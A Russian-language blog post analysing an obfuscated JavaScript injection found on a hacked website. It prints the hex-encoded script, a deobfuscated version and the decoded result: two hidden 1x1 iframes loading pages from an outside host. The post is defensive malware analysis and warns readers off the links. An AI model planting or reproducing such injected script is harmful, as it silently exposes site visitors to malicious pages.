RSS
 

Brainfuck

18 Апр

Существует некий мертворожденный язык, под названием Brainfuck, созданный исключительно для забавы, т.к. написание на нем даже самых простых вещей – занятие, хм, увлекательное.

Но речь на самом деле не об этом.

Друг админ на одном из своих сайтов, который был взломан, нашел вставку на JavaScript, телом подобную на Бреинфак. Вот она, в оригинале:

<br /><p align="left" style="font-size: 10pt; font-family: "Tahoma","sans-serif";"><span style="color: blue;"><</span><span style="color: rgb(163, 21, 21);">script</span><span style=""> <span style="color: red;">type</span><span style="color: blue;">="text/javascript"><o:p></o:p></span></span> <br /><br /><span style="color: blue;">function</span><span style=""> FE9EDF0D7A4F0CEA(C0F6E21C3D29789AB9){<span style="color: blue;">return</span>(parseInt(C0F6E21C3D29789AB9,16));}<span style="color: blue;">function</span> F576B68EA1A90A361F95C927A3AB0(A565B7932FBFA569){<span style="color: blue;">function</span> CE8A2FD7D1BF2E4EB562543F510(){<span style="color: blue;">var</span> DC39130D7AD642103B6E5C7AF9865CF=2;<span style="color: blue;">return</span> DC39130D7AD642103B6E5C7AF9865CF;}<span style="color: blue;">var</span> D0BEADB5B83CDF2490B4644ECB=<span style="color: rgb(163, 21, 21);">""</span>;<span style="color: blue;">for</span>(ABD7632B3272F7A21349C531316B4CE0=0;ABD7632B3272F7A21349C531316B4CE0<A565B7932FBFA569.length;ABD7632B3272F7A21349C531316B4CE0+=CE8A2FD7D1BF2E4EB562543F510()){D0BEADB5B83CDF2490B4644ECB+=(String.fromCharCode(FE9EDF0D7A4F0CEA(A565B7932FBFA569.substr(ABD7632B3272F7A21349C531316B4CE0,CE8A2FD7D1BF2E4EB562543F510()))));}document.write(D0BEADB5B83CDF2490B4644ECB);}F576B68EA1A90A361F95C927A3AB0(<span style="color: rgb(163, 21, 21);">"3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F696E2E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E"</span>);<o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: blue;"></</span><span lang="EN-US" style="color: rgb(163, 21, 21);">script</span><span lang="EN-US" style="color: blue;">></span><span lang="EN-US" style="color: green;"><!-- c65 --><!-- o65 --></span><span lang="EN-US" style="color: blue;"><</span><span lang="EN-US" style="color: rgb(163, 21, 21);">script</span><span lang="EN-US" style=""> <span style="color: red;">type</span><span style="color: blue;">="text/javascript"><o:p></o:p></span></span> <br /><br /><span lang="EN-US" style="color: blue;">function</span><span lang="EN-US" style=""> C2946B9058CAB48202FD5A50(C59A2ACA10C974FCF5D1A){<span style="color: blue;">function</span> FA0A27DE1258903845F(){<span style="color: blue;">var</span> C6C9C3659A0294961C15C7B1FDD0=16;<span style="color: blue;">return</span> C6C9C3659A0294961C15C7B1FDD0;}<span style="color: blue;">return</span>(parseInt(C59A2ACA10C974FCF5D1A,FA0A27DE1258903845F()));}<span style="color: blue;">function</span> B5002E3EACF261D8EC6(E513FB2F9DA4CE07F1DFF03E1A97F09){<span style="color: blue;">var</span> C892862A3FEB78EA987D68C93A459=<span style="color: rgb(163, 21, 21);">""</span>;<span style="color: blue;">for</span>(E01A32449D745FFA0CCF09C75FE=0;E01A32449D745FFA0CCF09C75FE<E513FB2F9DA4CE07F1DFF03E1A97F09.length;E01A32449D745FFA0CCF09C75FE+=2){C892862A3FEB78EA987D68C93A459+=(String.fromCharCode(C2946B9058CAB48202FD5A50(E513FB2F9DA4CE07F1DFF03E1A97F09.substr(E01A32449D745FFA0CCF09C75FE,2))));}document.write(C892862A3FEB78EA987D68C93A459);}B5002E3EACF261D8EC6(<span style="color: rgb(163, 21, 21);">"3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E"</span>);<o:p></o:p></span> <br /><br /><span style="color: blue;"></</span><span style="color: rgb(163, 21, 21);">script</span><span style="color: blue;">></span><span style="color: green;"><!-- c65 --></span></p>

 

После некоторых танцев преобразования, получается это:

 

<p align="left" style="font-size: 10pt; font-family: "Tahoma","sans-serif";"><span lang="EN-US" style="color: blue;"><</span><span lang="EN-US" style="color: rgb(163, 21, 21);">script</span><span lang="EN-US" style=""> <span style="color: red;">type</span><span style="color: blue;">="text/javascript"><o:p></o:p></span></span> <br /><br /><span lang="EN-US" style="color: blue;">function</span><span lang="EN-US" style=""> Func_1 (Value_1) {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">return</span>( parseInt(Value_1, 16) );<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">}<o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: blue;">function</span><span lang="EN-US" style=""> Func_2 (Value_2) {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">function</span> Func_3 () {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span><span style="color: blue;">var</span> Var_1 = 2;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span><span style="color: blue;">return</span> Var_1;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>}<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">var</span> Var_2 = <span style="color: rgb(163, 21, 21);">""</span>;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">for</span> (Value_3 = 0; Value_3 < Value_2.length; Value_3 += Func_3()) {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span>Var_2 += ( String.fromCharCode (Func_1 (Value_2.substr (Value_3, Func_3()))) );<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>}<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>document.write (Var_2);<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">}<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">Func_2 (<span style="color: rgb(163, 21, 21);">"3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F696E2E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E"</span>);<o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: blue;"></</span><span lang="EN-US" style="color: rgb(163, 21, 21);">script</span><span lang="EN-US" style="color: blue;">><o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: green;"><!-- c65 --><!-- o65 --><o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: blue;"><</span><span lang="EN-US" style="color: rgb(163, 21, 21);">script</span><span lang="EN-US" style=""> <span style="color: red;">type</span><span style="color: blue;">="text/javascript"><o:p></o:p></span></span> <br /><br /><span lang="EN-US" style="color: blue;">function</span><span lang="EN-US" style=""> Func_4 (Value_4) {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">function</span> Func_5 () {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span><span style="color: blue;">var</span> Var_3 = 16;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span><span style="color: blue;">return</span> Var_3;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>}<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">return</span> ( parseInt ( Value_4, Func_5 () ) );<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">}<o:p></o:p></span> <br /><br /><span lang="EN-US" style="color: blue;">function</span><span lang="EN-US" style=""> Func_6 (Value_5) { <o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">var</span> Var_4 = <span style="color: rgb(163, 21, 21);">""</span>;<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span><span style="color: blue;">for</span> (Value_6 = 0; Value_6<span style="">  </span>< Value_5.length; Value_6 += 2) {<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">                        </span>Var_4 += ( String.fromCharCode (Func_4 (Value_5.substr(Value_6,2))));<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>}<o:p></o:p></span> <br /><br /><span lang="EN-US" style=""><span style="">            </span>document.write(Var_4);<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">}<o:p></o:p></span> <br /><br /><span lang="EN-US" style="">Func_6(<span style="color: rgb(163, 21, 21);">"3C696672616D65207372633D687474703A2F2F746865746578746465736B2E636F6D2F2077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E"</span>);<o:p></o:p></span> <br /><br /><span style="color: blue;"></</span><span style="color: rgb(163, 21, 21);">script</span><span style="color: blue;">></span><span style="color: green;"><!-- c65 --></span></p>

 

Теперь ясна архитектура, но мозгом расшифровать, во что же преобразуются эти 2 строки – это как раз занятие из разряда Brainfuck. Проще изолировать выводимый код, например, в textarea.
Получаем, – красиво, просто, и неотвратимо:

 

<p align="left" style="font-size: 10pt; font-family: "Tahoma","sans-serif";"><span lang="EN-US" style="color: blue;"><</span><span lang="EN-US" style="color: rgb(163, 21, 21);">iframe</span><span lang="EN-US" style=""> <span style="color: red;">src</span><span style="color: blue;">=http://thetextdesk.com/in.php</span> <span style="color: red;">width</span><span style="color: blue;">=1</span> <span style="color: red;">height</span><span style="color: blue;">=1</span> <span style="color: red;">style</span><span style="color: blue;">="</span><span style="color: red;">display</span>:<span style="color: blue;">none"></</span><span style="color: rgb(163, 21, 21);">iframe</span><span style="color: blue;">><o:p></o:p></span></span> <br /><br /><span lang="EN-US" style="color: blue;"><</span><span lang="EN-US" style="color: rgb(163, 21, 21);">iframe</span><span lang="EN-US" style=""> <span style="color: red;">src</span><span style="color: blue;">=http://thetextdesk.com/</span> <span style="color: red;">width</span><span style="color: blue;">=1</span> <span style="color: red;">height</span><span style="color: blue;">=1</span> <span style="color: red;">style</span><span style="color: blue;">="</span><span style="color: red;">display</span>:<span style="color: blue;">none"></</span><span style="color: rgb(163, 21, 21);">iframe</span><span style="color: blue;">></span></span><span lang="EN-US" style=""><o:p></o:p></span></p>

 

P.S. Пользоваться ссылками тем, кто простой юзер, не рекомендую.

 

 
 

Leave a Reply

 
*

 
 
Rambler's Top100